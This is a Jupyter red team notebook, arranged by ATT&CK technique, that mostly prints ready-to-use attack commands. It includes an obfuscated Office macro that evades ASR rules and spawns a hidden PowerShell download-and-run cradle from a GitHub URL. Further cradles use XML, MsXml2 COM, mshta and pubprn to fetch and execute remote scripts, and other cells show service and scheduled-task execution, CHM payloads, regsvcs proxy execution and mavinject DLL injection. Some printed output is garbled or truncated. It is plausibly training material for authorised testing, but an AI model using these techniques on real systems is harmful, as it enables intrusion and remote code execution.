# my Red Team Notebook




<a id="index"></a>
## Index

[Global Settings](#global)

[Initial Access](#InitialAccess)

[Execution](#execution)

<a id="global"></a>
### Global Settings

[Back to Index](#index)

In [1]:
globalPath = "/home/kali/Q1-Redteam/"

<a id="initialAccess"></a>
### Initial Access

[Back to Index](#index)

[T1566 - Phishing - Spearphishing Attachment](#T1566Spear)

<a id="T1566Spear"></a>
#### T1566 - Phishing - Spearphishing Attachment

[Back to Initial Access](#initialAccess)

In [10]:
path = globalPath + "initialAccess/T1566/"
pwshScriptLocation = "https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1099.ps1"
# Macro that uses WMI to start a process, execute cmd and then download a powershell script
macro = """
Sub ASR_bypass_create_child_process_rule5()
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
    objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri '""" + pwshScriptLocation + """')", Null, objConfig, intProcessID
End Sub
"""
print(macro)


Sub ASR_bypass_create_child_process_rule5()
    Const HIDDEN_WINDOW = 0
    strComputer = "."
oot" & "\cimv2")
    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
oot" & "\cimv2" & ":Win32_" & "Process")
    objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1099.ps1')", Null, objConfig, intProcessID
End Sub



<a id="execution"></a>
### Execution

[Back to Index](#index)

[T1035 - Execute a Command as a Service](#commandservice)

[T1053 - Scheduled Task (Local)](#tasklocal)

[T1053 - Scheduled Task (Remote)](#taskremote)

[T1059 - Powershell Execution of XML](#pwshxml)

[T1059 - Powershell Execution MSXML COM Object](#pwshxmlcom)

[T1191 - CMSTP Executing UAC Bypass](#cmstp)

[T1216 - Signed Script Proxy Execution: PubPrn](#pubprn)

[T1218 - Signed Binary Proxy Execution: Mshta](#mshta)

[T1218 - Signed Binary Execution: Regsvcs/Regasm](#regsvcs)

[T1218 - Signed Binary Execution: Compiled HTML Files](#chmfiles)

[T1218 - Signed Binary Execution: mavinject.exe - Creation of a dll using Code](#mavinject)

<a id="commandservice"></a>
#### T1035 - Execute a Command as a Service

````
The service will report that it did not start properly but will execute the command issued
````

[Back to Execution](#execution)

In [1]:
serviceName = "Test"
command = "cmd.exe /c notepad"
print("sc.exe create \"" + serviceName + "\" binPath=\"" + command + "\"")
print("")
print("sc.exe start \"" + serviceName + "\"")
print("")
print("sc.exe delete \"" + serviceName + "\"")

sc.exe create "Test" binPath="cmd.exe /c notepad"

sc.exe start "Test"

sc.exe delete "Test"


<a id="tasklocal"></a>
#### T1053 - Scheduled Task (Local)

[Back to Execution](#execution)

In [26]:
# Will schedule as a non-privileged however may get access is denied when executing
taskCommand = "C:\windows\system32\calc.exe"
# Time is in military
taskTime = "14:00"
print ("schtasks /Create /SC ONCE /TN T1053 /TR " + taskCommand + " /ST " + taskTime)

schtasks /Create /SC ONCE /TN T1053 /TR C:\windows\system32\calc.exe /ST 14:00


<a id="taskremote"></a>
#### T1053 - Scheduled Task (Remote)

[Back to Execution](#execution)

In [30]:
# Will schedule as a non-privileges user however may get access is denied when executing the command
remoteComp = "Win10"
taskTime = "14:00"
taskCommand = "C:\windows\system32\calc.exe"
# /RU "SYSTEM" - Schedule it to run as system
user = "domain\\user"
password = "plaintext"
# /NP Do not store the password and sets the run whether user is logged in or not

print ("schtasks /Create /S " + remoteComp + " /RU " + user + " /RP " + password + " /TN \"T1053\" /TR \"" + taskCommand + "\" /SC daily /ST " + taskTime + " /NP")

schtasks /Create /S Win10 /RU domain\user /RP plaintext /TN "T1053" /TR "C:\windows\system32\calc.exe" /SC daily /ST 14:00/NP


<a id="pwshxml"></a>
#### T1059 - Powershell Execution of XML

[Back to Execution](#execution)

In [22]:
# Command 
command = 'Write-Host -ForegroundColor Cyan "$(Get-Date -Format s) Download test success!`n"'
# Placed the below in an XML file stored at the below URL
xml = """
<?xml version="1.0"?>
<command>
   <a>
      <execute>""" + command + """</execute>
   </a>
  </command>
"""
# XML File
print(xml)
print("")


# Command
url = "https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1059.xml"
print("powershell.exe -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('" + url + "');$Xml.command.a.execute | IEX\"")


<?xml version="1.0"?>
<command>
   <a>
      <execute>Write-Host -ForegroundColor Cyan "$(Get-Date -Format s) Download test success!`n"</execute>
   </a>
  </command>


powershell.exe -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1059.xml');$Xml.command.a.execute | IEX"


<a id="pwshxmlcom"></a>
#### T1059 - Powershell Execution MSXML COM Object

[Back to Execution](#execution)

In [2]:
# Command 
# Placed the below in a ps1 file stored at the below URL
command = 'Write-Host -ForegroundColor Cyan "$(Get-Date -Format s) Download test success!`n"'
print(command)

print("")

url = "https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1059.ps1"
print("powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','" + url + "',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"")

Write-Host -ForegroundColor Cyan "$(Get-Date -Format s) Download test success!`n"

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1059.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"


<a id="cmstp"></a>
#### T1191 - CMSTP Executing UAC Bypass

[Back to Execution](#execution)

References: https://msitpros.com/?p=3960  # Using the inf file to execute commands

References: https://www.ired.team/offensive-security/code-execution/t1191-cmstp-code-execution # Load a dll to execute

In [1]:
# Tested with the T1191.inf and the T1191-cmd.inf files from 2021 RedTeam

<a id="pubprn"></a>
#### T1216 - Signed Script Proxy Execution: PubPrn

[Back to Execution](#execution)

References: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md

https://www.ired.team/offensive-security/code-execution/t1216-signed-script-ce

In [2]:
# Taken from ired.team above...
scriptLocation = "https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1216.txt"
print("cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:" + scriptLocation)

cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://github.com/thepcn3rd/2021-Red-Team/blob/main/T1218.txt


<a id="mshta"></a>
#### T1218 - Signed Binary Proxy Execution: Mshta

[Back to Execution](#execution)

Reference: https://www.ired.team/offensive-security/code-execution/t1170-mshta-code-execution

In [18]:
# The below will execute calc.exe 
# Location: https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1218.sct
url = "https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1218.sct"
command = "calc.exe"
xml = """
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
		var r = new ActiveXObject("WScript.Shell").Run('""" + command + """');
	}
]]>
</script>
</scriptlet>
"""

print(xml)

# Command to Execute - cmd
print("mshta.exe javascript:a=(GetObject(\"script:" + url + "\")).Exec();close();")
print("")
# Command to Execute from powershell
print("/cmd /c mshta.exe javascript:a=(GetObject(\"script:" + url + "\"))")


<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
		var r = new ActiveXObject("WScript.Shell").Run('calc.exe');
	}
]]>
</script>
</scriptlet>

mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1218.sct")).Exec();close();

/cmd /c mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/thepcn3rd/2021-Red-Team/main/T1218.sct"))


<a id="regsvcs"></a>
#### T1218 - Signed Binary Execution: Regsvcs

[Back to Execution](#execution)

Reference: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md

In [5]:
print("Save the C# on the box or pull through a webrequest into memory")

csFile = "RegSvcsRegaAsmBypass.cs"

print("""
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
namespace regsvcser
{

    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

		[ComRegisterFunction] //This executes if registration is successful
		public static void RegisterClass ( string key )
		{
			Console.WriteLine("I shouldn't really execute");
		}

		[ComUnregisterFunction] //This executes if registration fails
		public static void UnRegisterClass ( string key )
		{
			Console.WriteLine("I shouldn't really execute either.");
		}
    }
}
""")

keyFile = "key.snk"

# Reference on signing your own key file
# https://docs.microsoft.com/en-us/dotnet/standard/assembly/sign-strong-name

print("\n\nRun the follo(wing to generate the key.snk file for digitally signing the dll")
print ("""
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content """ + keyFile + """ -Value $Content -Encoding Byte
""")

cscLocation="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"
regsvcsLocation="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Regsvcs.exe"
regasmLocation="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Regasm.exe"
outputDLL="regsvcs.dll"

print("\n\nAfter the creation of the C# and the generation of the key then run the following to execute the dll")
print(cscLocation + " /r:System.EnterpriseServices.dll /target:library /out:" + outputDLL + " /keyfile:" + keyFile + " " +  csFile)
print(regsvcsLocation + " " + outputDLL)

# OR with regasm

print(regasmLocation + " /U " + outputDLL)

Save the C# on the box or pull through a webrequest into memory

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
namespace regsvcser
{

    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

		[ComRegisterFunction] //This executes if registration is successful
		public static void RegisterClass ( string key )
		{
			Console.WriteLine("I shouldn't really execute");
		}

		[ComUnregisterFunction] //This executes if registration fails
		public static void UnRegisterClass ( string key )
		{
			Console.WriteLine("I shouldn't really execute either.");
		}
    }
}



Run the follo(wing to generate the key.snk file for digitally signing the dll

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8M

<a id="chmfiles"></a>
#### T1218.001 - Signed Binary Execution: Compiled HTML Files 

[Back to Execution](#execution)

````
# Download from the archives
# Reference: http://web.archive.org/web/20160201063255/http://download.microsoft.com/download/0/A/9/0A939EF6-E31C-430F-A3DF-DFAE7960D564/htmlhelp.exe
# Reference: Uploaded to 2021-RedTeam T1218-1 Files

File -> New -> HTML - Create the HTML Below with the Command to Execute

File -> New -> Project - Create a new project and include the HTML above

````

In [6]:
print("""
<html>
    <head>
        <title>Compiled HTML Help File</title>
<OBJECT id="ART" type="application/x-oleobject" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" codebase="hhctrl.ocx#Version=5,02,3790,1194" width="1" height="1">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe, /c calc.exe">
<PARAM name="Item2" value="273,1,1">
</object>
<script>
ART.Click();
</script>
</head>
<body>
</body>
</html>
""")


<html>
    <head>
        <title>Compiled HTML Help File</title>
<OBJECT id="ART" type="application/x-oleobject" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" codebase="hhctrl.ocx#Version=5,02,3790,1194" width="1" height="1">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe, /c calc.exe">
<PARAM name="Item2" value="273,1,1">
</object>
<script>
ART.Click();
</script>
</head>
<body>
</body>
</html>



<a id="mavinject"></a>
#### T1218 - Signed Binary Proxy Execution: mavinject.exe

[Back to Execution](#execution)

Reference: https://docs.microsoft.com/en-us/dotnet/core/tutorials/library-with-visual-studio-code
````
1. Create a dll using Microsoft Visual Studio Code
2. Save dll to Github Location
3. Download dll to host that is being tested
4. Use mavinject.exe to inject the dll into a running process
````

###### dll code
`````
using System;

namespace UtilityLibraries
{
    public static class StringLibrary
    {
        public static bool StartsWithUpper(this string str)
        {
            if (string.IsNullOrWhiteSpace(str))
                return false;

            char ch = str[0];
            return char.IsUpper(ch);
        }
    }
}
`````

##### Create SLN Files

Reference: https://docs.microsoft.com/en-us/dotnet/core/tutorials/library-with-visual-studio-code

````
1. File ... Open Folder in VS Code
2. Open Terminal
3. Run "dotnet new sln" (Performed on my Ubuntu with .NET Core setup, easier than Windows 10)
4. Run "dotnet new classlib -o nameOfLibrary" 
5. Run "dotnet sln add StringLibrary/StringLibrary.csproj" to add the project to the solution
6. Take the dll code and replace what is in class1.cs
7. Save the file
8. From terminal run "dotnet build"
9. Renamed the dll to T1218.dll
10. Upload to github
````

In [5]:
# Powershell to pull and then execute mavinject
url = "https://github.com/thepcn3rd/2021-Red-Team/raw/main/T1218.dll"
dllName = "T1218.dll"
processID = 77012
print("Invoke-WebRequest \"" + url + "\" -OutFile \"" + dllName + "\"")
print("")
print("mavinject.exe " + str(processID) + " /INJECTRUNNING " + dllName)

Invoke-WebRequest "https://github.com/thepcn3rd/2021-Red-Team/raw/main/T1218.dll" -OutFile "T1218.dll"

mavinject.exe 77012 /INJECTRUNNING T1218.dll


$AssemblyPath = "C:\SomePath\SomeLIB.dll"
$bytes = [System.IO.File]::ReadAllBytes($AssemblyPath)
[System.Reflection.Assembly]::Load($bytes)
[launchCalc.Program]::Main()